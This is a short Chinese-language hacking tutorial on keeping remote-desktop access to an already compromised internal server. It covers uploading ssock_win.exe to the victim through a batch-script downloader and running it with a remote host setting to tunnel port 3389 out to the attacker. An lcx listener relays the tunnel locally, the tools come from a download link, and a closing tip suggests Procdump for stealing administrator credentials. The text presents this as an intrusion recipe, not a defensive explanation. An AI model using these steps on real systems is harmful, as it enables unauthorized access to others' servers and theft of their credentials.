内网端口端口转发

场景：拿下的肉鸡处内网状态，外网无法直接访问内网的3389或3306.

现以3389为例

所用工具：

肉鸡：ssock_win.exe

本地机器：lcx.exe

下载地址：链接: https://pan.baidu.com/s/1vN3ItPkaD5vWeIjrfGYDMg 密码: w374

lcx是不免杀的  但也没关系，因为是在本地执行lcx。exe

 

工具体原理就是用socket在肉鸡上做端口转发。

 

第一步：

把ssock_win.exe 上传至肉鸡，因为我拿的整站，上传文件大小做了限制，所以我只能写了一个bat脚本，上传至服务器运行后，下载ssock_win.exe。如果情况允许可直接上传，不然可用bat的方式

在肉鸡上执行：

ssock_win.exe --lport 3389 --rhost 100.00.00.00 --rport 2222

即格式为：ssock_win.exe --lport 本地端口 --rhost 外网连入地址 --rport 外网端口

执行成功后效果如图

 

第二步：

在外网连入机器上执行：

本机: lcx -listen 2222 3333

2222为转发端口，3333为本机任意未被占用的端口

执行成功效果如：

 

第三步：

在外网机器上打开远程桌面连接，地址：127.0.0.1:3333 即可

 

 

额外篇：

1、怎么获取管理员账号和密码？

答：用Procdump，

可参考https://www.cnblogs.com/hiccup/p/4380298.html